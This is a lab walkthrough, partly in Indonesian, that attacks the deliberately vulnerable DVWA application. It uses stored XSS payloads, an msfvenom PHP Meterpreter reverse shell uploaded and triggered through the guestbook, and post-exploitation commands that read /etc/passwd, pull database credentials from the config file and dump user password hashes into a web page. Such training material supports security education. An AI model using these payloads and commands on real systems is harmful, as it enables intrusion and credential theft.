Cross Site Scripting

What is Cross Site Scripting?

  • Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
  • XSS enables attackers to inject client-side script into Web pages viewed by other users.
  • A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
  • In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
  • The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this lab we will do the following:

  • We will test a basic cross site scripting (XSS) attack
  • We will test an iframe cross site scripting (XSS) attack
  • We will test a cookie cross site scripting (XSS) attack
  • We will create a php/meterpreter/reverse_tcp payload
  • We will start the php/meterpreter/reverse_tcp listener
  • We will upload the PHP payload to the DVWA Upload screen
  • We will test a PHP Payload cross site scripting (XSS) attack

Kali :

buka web brower (firefox) -> buka preference

preference :

  • Click on Content
  • Uncheck Block pop-up windows
  • Check Enable JavaScript
  • Click the Close Button

login dvwa -> XSS Stored

Name: Test 1
Message: <script>alert("This is a XSS Exploit Test")</script>
Click Sign Guestbook

karena tersimpan didatabase, maka setiap buka itu akan muncul popup

agar tidak muncul, setup -> create / reset database

Name: Test 2
Message: <iframe src="http://www.cnn.com"></iframe>
Click Sign Guestbook

dan

Name: Test 3
Message: <script>alert(document.cookie)</script>
Click Sign Guestbook

membuat payload :

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.30 LPORT=4444 R > FORUM_BUG.php
vi FORUM_BUG.php

Press "x" to delete the "#" character on the first line.
atau intinya hapus komentar di awal

file FORUM_BUG.php diupload melalui Site Upload Vuln

msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.43.30
set LPORT 4444
exploit

jadi seperti ini

Name: Test 4
Message: <script>window.location = "http://192.168.43.207/dvwa/hackable/uploads/FORUM_BUG.php"</script>
Click Sign Guestbook

Sudah connect di terminal

jalahkan perintah 'shell'

find configuraion files :

Displays the name of the user :

whoami</code></pre>

The goal of this command is obtaining the home directory for the apache username :

grep apache /etc/passwd</code></pre>

Here I am wanting to find all the configuration files in the /var/www directory :

find /var/www/* -print | grep config</code></pre>

This produces the database name, username, and password information to log into the mysql database :

grep "db_" /var/www/html/dvwa/config/config.inc.php</code></pre>

This command produces a table list of the dvwa database :

echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD</code></pre>

This command describes the columns of the users table in the dvwa datase :

echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD</code></pre>

This command displays the user and password information for each user in the dvwa.users table.

echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD</code></pre>
echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html
date >> /var/www/html/dvwa/hackable/uploads/xss.html

buka di web browser :

http://192.168.43.207/dvwa/hackable/uploads/xss.html